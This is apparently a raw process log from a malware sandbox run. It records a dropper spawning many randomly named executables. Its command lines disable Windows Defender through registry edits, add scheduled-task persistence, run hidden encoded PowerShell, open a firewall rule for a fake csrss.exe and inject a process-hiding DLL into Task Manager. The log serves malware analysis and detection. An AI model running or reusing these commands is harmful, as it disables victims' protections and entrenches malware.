PID 5684 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
PID 5684 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe

"C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe"

C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe

"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"

C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe

"C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe"

C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe

"C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe"

C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe

"C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe"

C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe

"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"

C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe

"C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe"

C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe

"C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2868 -ip 2868

C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp" /SL5="$501CC,4124890,54272,C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"

C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe

"C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe"

C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe

"C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe"

C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe

"C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe

"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -i

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"

C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe

"C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe"

C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe

"C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe"

C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe

"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 344

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"

C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe

"C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe"

C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe

"C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe"

C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe

"C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe"

C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -s

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\6822f988-ccf5-4e57-afb4-dd971c700c06" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 412 -ip 412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 568

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffa9bc9758,0x7fffa9bc9768,0x7fffa9bc9778

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5820 -ip 5820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 2072

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "glrLJrRva" /SC once /ST 08:51:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4904 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "glrLJrRva"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4748 -ip 4748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 2164

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"

C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe

"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"

C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe

"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "glrLJrRva"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bokvhhUgtHQNbUrNPU" /SC once /ST 17:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe\" r1 /LNsite_idduL 525403 /S" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe

C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe r1 /LNsite_idduL 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

